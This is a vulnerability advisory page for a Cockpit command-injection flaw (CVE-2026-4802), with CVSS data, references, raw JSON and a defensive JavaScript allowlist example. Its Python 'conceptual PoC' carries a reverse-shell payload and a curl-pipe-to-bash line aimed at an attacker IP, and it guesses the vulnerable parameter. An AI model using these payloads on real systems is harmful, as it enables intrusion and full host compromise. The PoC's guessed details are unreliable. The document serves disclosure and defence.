Security Vulnerability Report
CVE-2026-4802 (CVSS 8.0, HIGH)

Published: 2026-05-11 14:16:32
Last Modified: 2026-05-12 14:20:57

Description

A flaw was found in Cockpit. This vulnerability allows a remote attacker to achieve arbitrary command execution on the host by exploiting unsanitized user-controlled parameters within crafted links in the system logs user interface (UI). An attacker can inject shell metacharacters and command substitutions into these parameters, leading to the execution of arbitrary shell commands on the affected system. This could result in a complete system compromise.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cockpit < commit e204cd130 (see the official fix advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-4802
# This script demonstrates how an attacker might inject a command.
# The vulnerability resides in the logs UI parameter handling.
import requests

target_url = "https://<target-cockpit-host>:9090"

# Attacker controlled IP for reverse shell
attacker_ip = "192.168.1.100"
attacker_port = "4444"

# Payload to inject shell metacharacters
# Example: ; /bin/bash -c 'curl http://attacker_ip/shell | bash'
payload = f"; /bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'"

# Vulnerable endpoint in Logs UI (Conceptual)
vulnerable_endpoint = "/cockpit/@localhost/system/logs#"

# Session cookie or authentication token would be required (PR:L)
cookies = {
    "cockpit": "<session_token>"
}

params = {
    "query": payload,  # Assuming the vulnerable parameter is 'query' or similar in logsJournal.jsx
    "options": "all"
}

try:
    response = requests.get(target_url + vulnerable_endpoint, params=params, cookies=cookies, verify=False)
    if response.status_code == 200:
        print("Payload sent successfully. Check for reverse shell.")
    else:
        print(f"Failed to send payload. Status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")
```
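As an added example (not Cockpit's own code and not the referenced fix), the defensive pattern that removes this bug class from a logs UI: parameters taken from a link fragment are validated against a strict allowlist and turned into a journalctl argument vector, so no value is ever interpreted by a shell. The parameter names (prio, tag, boot, since, grep) and their mapping to journalctl options are assumptions for illustration; the link fragments used to exercise it are constructed.

```javascript
// Added example (not Cockpit's own code): turn user-controlled parameters
// from a logs-view link into a journalctl argument vector, never a shell string.
// Parameter names and their option mapping are hypothetical for illustration.

// Characters that change meaning under a POSIX shell. Values containing any of
// these are rejected outright; no attempt is made to "escape" them.
const SHELL_META = /[;&|`$(){}<>\\'"\n\r]/;

// Every accepted parameter has a strict allowlist pattern and a mapping to a
// journalctl option (--priority, --identifier, --boot, --since, --grep).
const PARAM_RULES = {
  prio:  { re: /^[0-7]$/,                                     arg: v => `--priority=${v}` },
  tag:   { re: /^[A-Za-z0-9_.:-]{1,64}$/,                     arg: v => `--identifier=${v}` },
  boot:  { re: /^(-?\d{1,3}|[0-9a-f]{32})$/,                  arg: v => `--boot=${v}` },
  since: { re: /^\d{4}-\d{2}-\d{2}( \d{2}:\d{2}(:\d{2})?)?$/, arg: v => `--since=${v}` },
  grep:  { re: /^[A-Za-z0-9 _.:/-]{1,128}$/,                  arg: v => `--grep=${v}` },
};

// Parse the part of the link after '#' (e.g. "prio=3&tag=sshd") into an argv
// array. Unknown parameters and malformed values throw instead of being passed on.
function buildJournalArgv(fragment) {
  const argv = ["journalctl", "--output=json"];
  const qs = new URLSearchParams(fragment.replace(/^#/, ""));
  for (const [name, value] of qs) {
    // hasOwnProperty guard: prototype keys such as "constructor" are not rules
    if (!Object.prototype.hasOwnProperty.call(PARAM_RULES, name))
      throw new Error(`unknown log parameter: ${name}`);
    const rule = PARAM_RULES[name];
    if (SHELL_META.test(value) || !rule.re.test(value))
      throw new Error(`rejected value for ${name}`);
    argv.push(rule.arg(value));
  }
  // argv is meant for an exec-style spawn (argument vector); joining it into
  // a single command line for a shell would reintroduce the bug.
  return argv;
}

// Triage helper for reviewing suspect links: true when any parameter value
// carries shell metacharacters, i.e. the kind of input this CVE describes.
function looksLikeInjection(fragment) {
  const qs = new URLSearchParams(fragment.replace(/^#/, ""));
  return [...qs.values()].some(v => SHELL_META.test(v));
}
```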

References

Weakness: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection')
https://access.redhat.com/security/cve/CVE-2026-4802
https://bugzilla.redhat.com/show_bug.cgi?id=2451155
https://github.com/cockpit-project/cockpit/blob/e204cd130/pkg/systemd/logsJournal.jsx#L206-L210 (logsJournal.jsx at fix commit e204cd130)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4802",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T14:16:31.550",
    "lastModified": "2026-05-12T14:20:56.547",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Cockpit. This vulnerability allows a remote attacker to achieve arbitrary command execution on the host by exploiting unsanitized user-controlled parameters within crafted links in the system logs user interface (UI). An attacker can inject shell metacharacters and command substitutions into these parameters, leading to the execution of arbitrary shell commands on the affected system. This could result in a complete system compromise."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-78" }
        ]
      }
    ],
    "references": [
      { "url": "https://access.redhat.com/security/cve/CVE-2026-4802", "source": "[email protected]" },
      { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451155", "source": "[email protected]" },
      { "url": "https://github.com/cockpit-project/cockpit/blob/e204cd130/pkg/systemd/logsJournal.jsx#L206-L210", "source": "[email protected]" }
    ]
  }
}
```